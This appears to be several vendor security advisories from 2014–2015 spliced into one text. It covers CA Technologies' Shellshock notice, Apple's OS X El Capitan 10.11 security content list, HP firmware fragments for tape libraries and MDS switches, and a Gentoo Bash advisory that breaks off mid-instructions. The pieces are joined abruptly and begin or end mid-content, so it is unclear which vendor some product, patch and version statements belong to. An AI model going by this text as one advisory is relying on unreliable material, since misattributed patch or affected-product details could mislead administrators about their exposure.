AIX Android (not vulnerable, unless rooted) Apple iOS (not vulnerable unless jailbroken) Linux Mac OS X Solaris Windows (not vulnerable unless Cygwin or similar ported Linux tools with Bash shell are installed) Other UNIX/BSD based systems if Bash is installed Any other OS or JeOS that utilizes Bash
Affected Products
The following products have been identified as potentially vulnerable, and we have made fixes available for all of these products.
CA API Management (Linux appliance only)
CA Application Performance Management (TIM is the only affected APM component)
CA Application Performance Management Cloud Monitor
CA Customer Experience Manager (CEM) Transaction Impact Monitor (TIM)
CA Layer 7 products (API Gateway, Mobile Access Gateway, API Management Portal)
CA User Activity Reporting Module (Enterprise Log Manager)
Note: This security notice will be updated if other CA Technologies products are determined to be vulnerable.
In most cases, the Bash vulnerabilities will need to be patched by OS vendors. Exceptions may include CA Technologies appliances, and software products that include Linux, UNIX or Mac OS X based operating systems (that include Bash).
Affected Components
CentOS Cygwin GNU Bash Red Hat Enterprise Linux SUSE Linux
Non-Affected Products
IMPORTANT NOTE: This listing includes only a small subset of the unaffected CA Technologies products. We're including unaffected products that customers have already inquired about. While the following CA Technologies products are not directly affected by the Bash vulnerabilities, the underlying operating systems that CA Technologies software is installed on may be vulnerable. We strongly encourage our customers to follow the recommendations provided by their vendors for all operating systems they utilize.
All CA SaaS / On Demand products were either not vulnerable or have already been patched.
CA AHS / PaymentMinder - AHS App is not vulnerable. The AHS app does not execute CGI scripts, or spawn or execute shell commands from within the app. AHS infrastructure already patched.
CA Asset Portfolio Management
CA AuthMinder (Arcot WebFort)
CA AuthMinder for Business Users
CA AuthMinder for Consumers
CA AutoSys products - We use the bash shell that comes with the operating system and the customer is responsible for patching their OS. Additionally, the agents themselves do not distribute any scripts that use bash.
CA Clarity On Demand
CA CloudMinder - CloudMinder does not include the Bash Shell in BoM, or use it, but because we are deployed on RHEL, customers may be indirectly affected. Customers using RHEL should apply patches provided by Red Hat.
CA Console Management for OpenVMS - Our OpenVMS products do not bundle bash, and they do not supply bash scripts; we use nothing but the native DCL CLI.
CA ControlMinder
CA DataMinder (formerly DLP) products – Software and appliance confirmed not vulnerable. Note: Linux Agents shipped, but no public SSH or Web apps are used in these agents. Customers should patch bash shell on any Linux server with DataMinder agents. DataMinder agents should continue to function normally.
CA Digital Payments SaaS (previously patched)
CA Directory
CA eCommerce SaaS / On Demand (previously patched)
CA Endevor Software Change Manager
CA Federation (formerly SiteMinder Federation)
CA GovernanceMinder
CA IdentityMinder
CA Infrastructure Management
CA JCLCheck
CA Job Management for OpenVMS - Our OpenVMS products do not bundle bash, and they do not supply bash scripts; we use nothing but the native DCL CLI.
CA NetQoS GigaStor Observer Expert
CA Network Flow Analysis
CA Performance Management for OpenVMS - Our OpenVMS products do not bundle bash, and they do not supply bash scripts; we use nothing but the native DCL CLI.
CA RiskMinder
CA Service Desk Manager
CA Service Operations Insight (SOI)
CA SiteMinder
CA SOLVE:Access
CA Spectrum for Linux - Not vulnerable. Be sure to apply bash fixes from your underlying operating system vendor.
CA Strong Authentication
CA System Watchdog for OpenVMS - Our OpenVMS products do not bundle bash, and they do not supply bash scripts; we use nothing but the native DCL CLI.
CA Top Secret
CA Universal Job Management Agent for OpenVMS - Our OpenVMS products do not bundle bash, and they do not supply bash scripts; we use nothing but the native DCL CLI.
CA Virtual Assurance for Infrastructure Managers (VAIM)
Solution
CA Technologies has issued the following fixes to address the vulnerabilities.
CA API Management: Patches for Linux appliance are available through CA Support to customers of Gateway (applicable for all versions – 6.1.5, 6.2, 7.0, 7.1, 8.0, 8.1, 8.1.1, 8.1.02).
CA Application Performance Management: KB article for APM TIM has been published. APM TIM is the only part of APM that was affected. Refer to TEC618037.
CA Application Performance Management Cloud Monitor: New images are available for subscribers. Download the latest OPMS version 8.2.1.5. For assistance, contact CA Support.
CA Customer Experience Manager (CEM) Transaction Impact Monitor (TIM): Very low risk. 9.6 is not affected. 9.5 Installation uses Bash. We do not use Bash at all for the CEM operating system that we have shipped in the past. This means that customers who patch the OS will not impact the ability of the CEM TIMsoft from operating. However prior to version 9.6, the TIM installation script does use the bash shell. See new KB article TEC618037 for additional information.
CA Layer 7 (API Gateway, Mobile Access Gateway, API Management Portal): Fixes for all Bash vulnerabilities and a security bulletin are available on the Layer 7 Support website.
CA User Activity Reporting Module (Enterprise Log Manager): All 12.5 and 12.6 GA versions are potentially affected. Patches provided on 2014-09-30. To get the patch, use the OS update functionality to get the latest R12.6 SP1 subscription update. Note that you can update R12.5 SPx with the R12.6 SP1 OS update. For assistance, contact CA Support.
Workaround
None
To help mitigate the risk, we do strongly encourage all customers to follow patch management best practices, and in particular for operating systems affected by the Bash Shellshock vulnerabilities.
References
CVE-2014-6271 - Bash environment variable command injection CVE-2014-7169 - Bash environment variable incomplete fix for CVE-2014-6271 CVE-2014-7186 - Bash parser redir_stack memory corruption CVE-2014-7187 - Bash nested flow control constructs off-by-one CVE-2014-6277 - Bash untrusted pointer use uninitialized memory CVE-2014-6278 - Bash environment variable command injection
CA20141001-01: Security Notice for Bash Shellshock Vulnerability https://support.ca.com/irj/portal/anonymous/phpsbpldgpg
Change History
v1.0: 2014-10-01, Initial Release v1.1: 2014-10-02, Added AuthMinder, Strong Authentication, VAIM, Clarity OD, All SaaS/OD products to list of Non-Affected Products. v1.2: 2014-10-03, Added RiskMinder to Non-Affected Products. Updated UARM solution info.
If additional information is required, please contact CA Technologies Support at https://support.ca.com.
If you discover a vulnerability in CA Technologies products, please report your findings to the CA Technologies Product Vulnerability Response Team at vuln@ca.com. PGP key: support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Security Notices https://support.ca.com/irj/portal/anonymous/phpsbpldgpg
Regards, Ken Williams Director, Product Vulnerability Response Team CA Technologies | One CA Plaza | Islandia, NY 11749 | www.ca.com Ken.Williams@ca.com | vuln@ca.com
Copyright © 2014 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y. 11749. All other trademarks, trade names, service marks, and logos referenced herein belong to their respective companies.
-----BEGIN PGP SIGNATURE----- Version: Encryption Desktop 10.3.2 (Build 15238) Charset: utf-8
wsBVAwUBVDK+PZI1FvIeMomJAQFl/Af/TqrSE/h4r3gs9PwrWKdt21PCRI3za9Lx M5ZyTdVDIQ9ybgPkLqsovNRPgVqd7zwDHsx0rzvF5Y82uO+vQ63BuEV2GnczAax/ EiAW4WVxUgWG+lAowGV55Of8ruv/gOiAWTjFhkqpsyVg96ZMw2HLG62IwZL1j0qa oLCu0y3VrGvqH0g2hi75QwHAjNCdlEsD4onUqTCc9cRTdLwFCZrUQ8KTrqIL7LK5 Uo5T9C1UeAyNTo3KiJ/zw3BCOTkpl99dmg3NW0onU/1r1CXdlyS7opLB+GJ+xGwP xRQdUsOIhzfRzx7bsao2D43IhDnzJBBFJHdeMPo18WBTfJ7aUgBwGQ== =B62b -----END PGP SIGNATURE----- .
HP Product Firmware Version
HP StoreEver ESL G3 Tape Libraries with MCB version 2 680H_GS40701
HP StoreEver ESL G3 Tape Libraries with MCB version 1 656H_GS10801
The firmware is customer installable and is available in the Drivers, Software & Firmware section at the following location:
http://www.hp.com/support/eslg3
Notes:
- Updating the library firmware requires a reboot of the library.
- If the library firmware cannot be updated, HP recommends following the
Mitigation Instructions below.
- Disable DHCP and only use static IP addressing. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2015-09-30-3 OS X El Capitan 10.11
OS X El Capitan 10.11 is now available and addresses the following:
Address Book Available for: Mac OS X v10.6.8 and later Impact: A local attacker may be able to inject arbitrary code to processes loading the Address Book framework Description: An issue existed in Address Book framework's handling of an environment variable. This issue was addressed through improved environment variable handling. CVE-ID CVE-2015-5897 : Dan Bastone of Gotham Digital Science
AirScan Available for: Mac OS X v10.6.8 and later Impact: An attacker with a privileged network position may be able to extract payload from eSCL packets sent over a secure connection Description: An issue existed in the processing of eSCL packets. This issue was addressed through improved validation checks. CVE-ID CVE-2015-5853 : an anonymous researcher
apache_mod_php Available for: Mac OS X v10.6.8 and later Impact: Multiple vulnerabilities in PHP Description: Multiple vulnerabilities existed in PHP versions prior to 5.5.27, including one which may have led to remote code execution. This issue was addressed by updating PHP to version 5.5.27. CVE-ID CVE-2014-9425 CVE-2014-9427 CVE-2014-9652 CVE-2014-9705 CVE-2014-9709 CVE-2015-0231 CVE-2015-0232 CVE-2015-0235 CVE-2015-0273 CVE-2015-1351 CVE-2015-1352 CVE-2015-2301 CVE-2015-2305 CVE-2015-2331 CVE-2015-2348 CVE-2015-2783 CVE-2015-2787 CVE-2015-3329 CVE-2015-3330
Apple Online Store Kit Available for: Mac OS X v10.6.8 and later Impact: A malicious application may gain access to a user's keychain items Description: An issue existed in validation of access control lists for iCloud keychain items. This issue was addressed through improved access control list checks. CVE-ID CVE-2015-5836 : XiaoFeng Wang of Indiana University, Luyi Xing of Indiana University, Tongxin Li of Peking University, Tongxin Li of Peking University, Xiaolong Bai of Tsinghua University
AppleEvents Available for: Mac OS X v10.6.8 and later Impact: A user connected through screen sharing can send Apple Events to a local user's session Description: An issue existed with Apple Event filtering that allowed some users to send events to other users. This was addressed by improved Apple Event handling. CVE-ID CVE-2015-5849 : Jack Lawrence (@_jackhl)
Audio Available for: Mac OS X v10.6.8 and later Impact: Playing a malicious audio file may lead to an unexpected application termination Description: A memory corruption issue existed in the handling of audio files. This issue issue was addressed through improved memory handling. CVE-ID CVE-2015-5862 : YoungJin Yoon of Information Security Lab. (Adv.: Prof. Taekyoung Kwon), Yonsei University, Seoul, Korea
bash Available for: Mac OS X v10.6.8 and later Impact: Multiple vulnerabilities in bash Description: Multiple vulnerabilities existed in bash versions prior to 3.2 patch level 57. These issues were addressed by updating bash version 3.2 to patch level 57. CVE-ID CVE-2014-6277 CVE-2014-7186 CVE-2014-7187
Certificate Trust Policy Available for: Mac OS X v10.6.8 and later Impact: Update to the certificate trust policy Description: The certificate trust policy was updated. The complete list of certificates may be viewed at https://support.apple.com/en- us/HT202858.
CFNetwork Cookies Available for: Mac OS X v10.6.8 and later Impact: An attacker in a privileged network position can track a user's activity Description: A cross-domain cookie issue existed in the handling of top level domains. The issue was address through improved restrictions of cookie creation. CVE-ID CVE-2015-5885 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua University
CFNetwork FTPProtocol Available for: Mac OS X v10.6.8 and later Impact: Malicious FTP servers may be able to cause the client to perform reconnaissance on other hosts Description: An issue existed in the handling of FTP packets when using the PASV command. This issue was resolved through improved validation. CVE-ID CVE-2015-5912 : Amit Klein
CFNetwork HTTPProtocol Available for: Mac OS X v10.6.8 and later Impact: A maliciously crafted URL may be able to bypass HSTS and leak sensitive data Description: A URL parsing vulnerability existed in HSTS handling. This issue was addressed through improved URL parsing. CVE-ID CVE-2015-5858 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua University
CFNetwork HTTPProtocol Available for: Mac OS X v10.6.8 and later Impact: A malicious website may be able to track users in Safari private browsing mode Description: An issue existed in the handling of HSTS state in Safari private browsing mode. This issue was addressed through improved state handling. CVE-ID CVE-2015-5860 : Sam Greenhalgh of RadicalResearch Ltd
CFNetwork Proxies Available for: Mac OS X v10.6.8 and later Impact: Connecting to a malicious web proxy may set malicious cookies for a website Description: An issue existed in the handling of proxy connect responses. This issue was addressed by removing the set-cookie header while parsing the connect response. CVE-ID CVE-2015-5841 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua University
CFNetwork SSL Available for: Mac OS X v10.6.8 and later Impact: An attacker with a privileged network position may intercept SSL/TLS connections Description: A certificate validation issue existed in NSURL when a certificate changed. This issue was addressed through improved certificate validation. CVE-ID CVE-2015-5824 : Timothy J. Wood of The Omni Group
CFNetwork SSL Available for: Mac OS X v10.6.8 and later Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of RC4. An attacker could force the use of RC4, even if the server preferred better ciphers, by blocking TLS 1.0 and higher connections until CFNetwork tried SSL 3.0, which only allows RC4. This issue was addressed by removing the fallback to SSL 3.0.
CoreCrypto Available for: Mac OS X v10.6.8 and later Impact: An attacker may be able to determine a private key Description: By observing many signing or decryption attempts, an attacker may have been able to determine the RSA private key. This issue was addressed using improved encryption algorithms.
CoreText Available for: Mac OS X v10.6.8 and later Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-5874 : John Villamil (@day6reak), Yahoo Pentest Team
Dev Tools Available for: Mac OS X v10.6.8 and later Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in dyld. This was addressed through improved memory handling. CVE-ID CVE-2015-5876 : beist of grayhash
Dev Tools Available for: Mac OS X v10.6.8 and later Impact: An application may be able to bypass code signing Description: An issue existed with validation of the code signature of executables. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-5839 : @PanguTeam
Disk Images Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in DiskImages. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5847 : Filippo Bigarella, Luca Todesco
dyld Available for: Mac OS X v10.6.8 and later Impact: An application may be able to bypass code signing Description: An issue existed with validation of the code signature of executables. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-5839 : TaiG Jailbreak Team
EFI Available for: Mac OS X v10.6.8 and later Impact: A malicious application can prevent some systems from booting Description: An issue existed with the addresses covered by the protected range register. This issue was fixed by changing the protected range. CVE-ID CVE-2015-5900 : Xeno Kovah & Corey Kallenberg from LegbaCore
EFI Available for: Mac OS X v10.6.8 and later Impact: A malicious Apple Ethernet Thunderbolt adapter may be able to affect firmware flashing Description: Apple Ethernet Thunderbolt adapters could modify the host firmware if connected during an EFI update. This issue was addressed by not loading option ROMs during updates. CVE-ID CVE-2015-5914 : Trammell Hudson of Two Sigma Investments and snare
Finder Available for: Mac OS X v10.6.8 and later Impact: The "Secure Empty Trash" feature may not securely delete files placed in the Trash Description: An issue existed in guaranteeing secure deletion of Trash files on some systems, such as those with flash storage. This issue was addressed by removing the "Secure Empty Trash" option. CVE-ID CVE-2015-5901 : Apple
Game Center Available for: Mac OS X v10.6.8 and later Impact: A malicious Game Center application may be able to access a player's email address Description: An issue existed in Game Center in the handling of a player's email. This issue was addressed through improved access restrictions. CVE-ID CVE-2015-5855 : Nasser Alnasser
Heimdal Available for: Mac OS X v10.6.8 and later Impact: An attacker may be able to replay Kerberos credentials to the SMB server Description: An authentication issue existed in Kerberos credentials. This issue was addressed through additional validation of credentials using a list of recently seen credentials. CVE-ID CVE-2015-5913 : Tarun Chopra of Microsoft Corporation, U.S. and Yu Fan of Microsoft Corporation, China
ICU Available for: Mac OS X v10.6.8 and later Impact: Multiple vulnerabilities in ICU Description: Multiple vulnerabilities existed in ICU versions prior to 53.1.0. These issues were addressed by updating ICU to version 55.1. CVE-ID CVE-2014-8146 CVE-2014-8147 CVE-2015-5922
Install Framework Legacy Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to gain root privileges Description: A restriction issue existed in the Install private framework containing a privileged executable. This issue was addressed by removing the executable. CVE-ID CVE-2015-5888 : Apple
Intel Graphics Driver Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to execute arbitrary code with system privileges Description: Multiple memory corruption issues existed in the Intel Graphics Driver. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5830 : Yuki MIZUNO (@mzyy94) CVE-2015-5877 : Camillus Gerard Cai
IOAudioFamily Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to determine kernel memory layout Description: An issue existed in IOAudioFamily that led to the disclosure of kernel memory content. This issue was addressed by permuting kernel pointers. CVE-ID CVE-2015-5864 : Luca Todesco
IOGraphics Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues existed in the kernel. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5871 : Ilja van Sprundel of IOActive CVE-2015-5872 : Ilja van Sprundel of IOActive CVE-2015-5873 : Ilja van Sprundel of IOActive CVE-2015-5890 : Ilja van Sprundel of IOActive
IOGraphics Available for: Mac OS X v10.6.8 and later Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in IOGraphics which could have led to the disclosure of kernel memory layout. This issue was addressed through improved memory management. CVE-ID CVE-2015-5865 : Luca Todesco
IOHIDFamily Available for: Mac OS X v10.6.8 and later Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple memory corruption issues existed in IOHIDFamily. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5866 : Apple CVE-2015-5867 : moony li of Trend Micro
IOStorageFamily Available for: Mac OS X v10.6.8 and later Impact: A local attacker may be able to read kernel memory Description: A memory initialization issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5863 : Ilja van Sprundel of IOActive
Kernel Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues existed in the Kernel. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5868 : Cererdlong of Alibaba Mobile Security Team CVE-2015-5896 : Maxime Villard of m00nbsd CVE-2015-5903 : CESG
Kernel Available for: Mac OS X v10.6.8 and later Impact: A local process can modify other processes without entitlement checks Description: An issue existed where root processes using the processor_set_tasks API were allowed to retrieve the task ports of other processes. This issue was addressed through additional entitlement checks. CVE-ID CVE-2015-5882 : Pedro Vilaca, working from original research by Ming-chieh Pan and Sung-ting Tsai; Jonathan Levin
Kernel Available for: Mac OS X v10.6.8 and later Impact: A local attacker may control the value of stack cookies Description: Multiple weaknesses existed in the generation of user space stack cookies. These issues were addressed through improved generation of stack cookies. CVE-ID CVE-2013-3951 : Stefan Esser
Kernel Available for: Mac OS X v10.6.8 and later Impact: An attacker may be able to launch denial of service attacks on targeted TCP connections without knowing the correct sequence number Description: An issue existed in xnu's validation of TCP packet headers. This issue was addressed through improved TCP packet header validation. CVE-ID CVE-2015-5879 : Jonathan Looney
Kernel Available for: Mac OS X v10.6.8 and later Impact: An attacker in a local LAN segment may disable IPv6 routing Description: An insufficient validation issue existed in the handling of IPv6 router advertisements that allowed an attacker to set the hop limit to an arbitrary value. This issue was addressed by enforcing a minimum hop limit. CVE-ID CVE-2015-5869 : Dennis Spindel Ljungmark
Kernel Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to determine kernel memory layout Description: An issue existed that led to the disclosure of kernel memory layout. This was addressed through improved initialization of kernel memory structures. CVE-ID CVE-2015-5842 : beist of grayhash
Kernel Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to determine kernel memory layout Description: An issue existed in debugging interfaces that led to the disclosure of memory content. This issue was addressed by sanitizing output from debugging interfaces. CVE-ID CVE-2015-5870 : Apple
Kernel Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to cause a system denial of service Description: A state management issue existed in debugging functionality. This issue was addressed through improved validation. CVE-ID CVE-2015-5902 : Sergi Alvarez (pancake) of NowSecure Research Team
libc Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2014-8611 : Adrian Chadd and Alfred Perlstein of Norse Corporation
libpthread Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5899 : Lufeng Li of Qihoo 360 Vulcan Team
libxpc Available for: Mac OS X v10.6.8 and later Impact: Many SSH connections could cause a denial of service Description: launchd had no limit on the number of processes that could be started by a network connection. This issue was addressed by limiting the number of SSH processes to 40. CVE-ID CVE-2015-5881 : Apple
Login Window Available for: Mac OS X v10.6.8 and later Impact: The screen lock may not engage after the specified time period Description: An issue existed with captured display locking. The issue was addressed through improved lock handling. CVE-ID CVE-2015-5833 : Carlos Moreira, Rainer Dorau of rainer dorau informationsdesign, Chris Nehren, Kai Takac, Hans Douma, Toni Vaahtera, and an anonymous researcher
lukemftpd Available for: Mac OS X v10.6.8 and later Impact: A remote attacker may be able to deny service to the FTP server Description: A glob-processing issue existed in tnftpd. This issue was addressed through improved glob validation. CVE-ID CVE-2015-5917 : Maksymilian Arciemowicz of cxsecurity.com
Mail Available for: Mac OS X v10.6.8 and later Impact: Printing an email may leak sensitive user information Description: An issue existed in Mail which bypassed user preferences when printing an email. This issue was addressed through improved user preference enforcement. CVE-ID CVE-2015-5881 : Owen DeLong of Akamai Technologies, Noritaka Kamiya, Dennis Klein from Eschenburg, Germany, Jeff Hammett of Systim Technology Partners
Mail Available for: Mac OS X v10.6.8 and later Impact: An attacker in a privileged network position may be able to intercept attachments of S/MIME-encrypted e-mail sent via Mail Drop Description: An issue existed in handling encryption parameters for large email attachments sent via Mail Drop. The issue is addressed by no longer offering Mail Drop when sending an encrypted e-mail. CVE-ID CVE-2015-5884 : John McCombs of Integrated Mapping Ltd
Multipeer Connectivity Available for: Mac OS X v10.6.8 and later Impact: A local attacker may be able to observe unprotected multipeer data Description: An issue existed in convenience initializer handling in which encryption could be actively downgraded to a non-encrypted session. This issue was addressed by changing the convenience initializer to require encryption. CVE-ID CVE-2015-5851 : Alban Diquet (@nabla_c0d3) of Data Theorem
NetworkExtension Available for: Mac OS X v10.6.8 and later Impact: A malicious application may be able to determine kernel memory layout Description: An uninitialized memory issue in the kernel led to the disclosure of kernel memory content. This issue was addressed through improved memory initialization. CVE-ID CVE-2015-5831 : Maxime Villard of m00nbsd
Notes Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to leak sensitive user information Description: An issue existed in parsing links in the Notes application. This issue was addressed through improved input validation. CVE-ID CVE-2015-5878 : Craig Young of Tripwire VERT, an anonymous researcher
Notes Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to leak sensitive user information Description: A cross-site scripting issue existed in parsing text by the Notes application. This issue was addressed through improved input validation. CVE-ID CVE-2015-5875 : xisigr of Tencent's Xuanwu LAB (www.tencent.com)
OpenSSH Available for: Mac OS X v10.6.8 and later Impact: Multiple vulnerabilities in OpenSSH Description: Multiple vulnerabilities existed in OpenSSH versions prior to 6.9. These issues were addressed by updating OpenSSH to version 6.9. CVE-ID CVE-2014-2532
OpenSSL Available for: Mac OS X v10.6.8 and later Impact: Multiple vulnerabilities in OpenSSL Description: Multiple vulnerabilities existed in OpenSSL versions prior to 0.9.8zg. These were addressed by updating OpenSSL to version 0.9.8zg. CVE-ID CVE-2015-0286 CVE-2015-0287
procmail Available for: Mac OS X v10.6.8 and later Impact: Multiple vulnerabilities in procmail Description: Multiple vulnerabilities existed in procmail versions prior to 3.22. These issues were addressed by removing procmail. CVE-ID CVE-2014-3618
remote_cmds Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to execute arbitrary code with root privileges Description: An issue existed in the usage of environment variables by the rsh binary. This issue was addressed by dropping setuid privileges from the rsh binary. CVE-ID CVE-2015-5889 : Philip Pettersson
removefile Available for: Mac OS X v10.6.8 and later Impact: Processing malicious data may lead to unexpected application termination Description: An overflow fault existed in the checkint division routines. This issue was addressed with improved division routines. CVE-ID CVE-2015-5840 : an anonymous researcher
Ruby Available for: Mac OS X v10.6.8 and later Impact: Multiple vulnerabilities in Ruby Description: Multiple vulnerabilities existed in Ruby versions prior to 2.0.0p645. These were addressed by updating Ruby to version 2.0.0p645. CVE-ID CVE-2014-8080 CVE-2014-8090 CVE-2015-1855
Security Available for: Mac OS X v10.6.8 and later Impact: The lock state of the keychain may be incorrectly displayed to the user Description: A state management issue existed in the way keychain lock status was tracked. This issue was addressed through improved state management. CVE-ID CVE-2015-5915 : Peter Walz of University of Minnesota, David Ephron, Eric E. Lawrence, Apple
Security Available for: Mac OS X v10.6.8 and later Impact: A trust evaluation configured to require revocation checking may succeed even if revocation checking fails Description: The kSecRevocationRequirePositiveResponse flag was specified but not implemented. This issue was addressed by implementing the flag. CVE-ID CVE-2015-5894 : Hannes Oud of kWallet GmbH
Security Available for: Mac OS X v10.6.8 and later Impact: A remote server may prompt for a certificate before identifying itself Description: Secure Transport accepted the CertificateRequest message before the ServerKeyExchange message. This issue was addressed by requiring the ServerKeyExchange first. CVE-ID CVE-2015-5887 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine Delignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of INRIA Paris-Rocquencourt, and Cedric Fournet and Markulf Kohlweiss of Microsoft Research, Pierre-Yves Strub of IMDEA Software Institute
SMB Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5891 : Ilja van Sprundel of IOActive
SMB Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to determine kernel memory layout Description: An issue existed in SMBClient that led to the disclosure of kernel memory content. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-5893 : Ilja van Sprundel of IOActive
SQLite Available for: Mac OS X v10.6.8 and later Impact: Multiple vulnerabilities in SQLite v3.8.5 Description: Multiple vulnerabilities existed in SQLite v3.8.5. These issues were addressed by updating SQLite to version 3.8.10.2. CVE-ID CVE-2015-3414 CVE-2015-3415 CVE-2015-3416
Telephony Available for: Mac OS X v10.6.8 and later Impact: A local attacker can place phone calls without the user's knowledge when using Continuity Description: An issue existed in the authorization checks for placing phone calls. This issue was addressed through improved authorization checks. CVE-ID CVE-2015-3785 : Dan Bastone of Gotham Digital Science
Terminal Available for: Mac OS X v10.6.8 and later Impact: Maliciously crafted text could mislead the user in Terminal Description: Terminal did not handle bidirectional override characters in the same way when displaying text and when selecting text. This issue was addressed by suppressing bidirectional override characters in Terminal. CVE-ID CVE-2015-5883 : an anonymous researcher
tidy Available for: Mac OS X v10.6.8 and later Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: Multiple memory corruption issues existed in tidy. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5522 : Fernando Munoz of NULLGroup.com CVE-2015-5523 : Fernando Munoz of NULLGroup.com
Time Machine Available for: Mac OS X v10.6.8 and later Impact: A local attacker may gain access to keychain items Description: An issue existed in backups by the Time Machine framework. This issue was addressed through improved coverage of Time Machine backups. CVE-ID CVE-2015-5854 : Jonas Magazinius of Assured AB
Note: OS X El Capitan 10.11 includes the security content of Safari 9: https://support.apple.com/kb/HT205265.
OS X El Capitan 10.11 may be obtained from the Mac App Store: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Comment: GPGTools - http://gpgtools.org
iQIcBAEBCAAGBQJWDB2wAAoJEBcWfLTuOo7t0sYP/2L3JOGPkHH8XUh2YHpu5qaw S5F2v+SRpWleKQBVsGZ7oA8PV0rBTzEkzt8K1tNxYmxEqL9f/TpRiGoforn89thO /hOtmVOfUcBjPZ4XKwMVzycfSMC9o6LxWTLEKDVylE+F+5jkXafOC9QaqD11dxX6 QhENkpS1BwrKhyaSVxEcgBQtZM9aTsVdZ78rTCb9XTn6gDnvs8NfIQquFOnaQT54 YJ36e5UcUsnyBIol+yGDbC3ZEhzSVIGE5/8/NFlFfRXLgnJArxD8lqz8WdfU9fop hpT/dDqqAdYbRcW1ihcG1haiNHgP9yQCY5jRNfttb+Tc/kIi/QmPkEO0QS8Ygt/O c3sUbNulr1LCinymFVwx16CM1DplGS/GmBL18BAEBnL6yi9tEhYDynZWLSEa37VR 8q802rXRSF10Wct9/kEeR4HgY/1k0KK/4Uddm3c0YyOU21ya7NAhoHGwmDa9g11r N1TniOK8tPiCGjRNOJwuF6DKxD9L3Fv44bVlxAarGUGYkICqzaNS+bgKI1aQNahT fJ91x5uKD4+L9v9c5slkoDIvWqIhO9oyuxgnmC5GstkwFplFXSOklLkTktjLGNn1 nJq8cPnZ/3E1RXTEwVhGljYw5pdZHNx98XmLomGrPqVlZfjGURK+5AXdf2pOlt2e g6jld/w5tPuCFhGucE7Z =XciV -----END PGP SIGNATURE----- . No other firmware stream updates are planned beyond the NX-OS 5.x and 6.x versions listed below for the MDS products.
HP has released and posted the Cisco switch software version NX-OS 6.2(9a) on HP Support Center (HPSC). This software versions 6.2(9a) has included the fixes for the vulnerability in HP StoreFabric C-series MDS switches which currently supporting NX-OS 6.X releases. HP has released and posted the Cisco switch software version NX-OS 5.2(8e) on HP Support Center (HPSC). This software version 5.2(8e) has included the fix for the vulnerability in HP C-series MDS switches which currently supporting NX-OS 5.X releases. All MDS and Nexus 5K switches can function in this configuration. Access is available through the console port. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201410-01
http://security.gentoo.org/
Severity: High Title: Bash: Multiple vulnerabilities Date: October 04, 2014 Bugs: #523742, #524256 ID: 201410-01
Synopsis
Multiple parsing flaws in Bash could allow remote attackers to inject code or cause a Denial of Service condition.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-shells/bash < 4.2_p52 >= 3.1_p22 >= 3.2_p56 >= 4.0_p43 >= 4.1_p16 >= 4.2_p52
Description
Florian Weimer, Todd Sabin, Michal Zalewski et al. discovered further parsing flaws in Bash. The unaffected Gentoo packages listed in this GLSA contain the official patches to fix the issues tracked as CVE-2014-6277, CVE-2014-7186, and CVE-2014-7187. Furthermore, the official patch known as "function prefix patch" is included which prevents the exploitation of CVE-2014-6278.
Workaround
There is no known workaround at this time.
Resolution
All Bash 3.1 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=app-shells/bash-3.1_p22:3.1"
All Bash 3.2 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=app-shells/bash-3.2_p56:3.2"
All Bash 4.0 users should upgrade to the latest version:
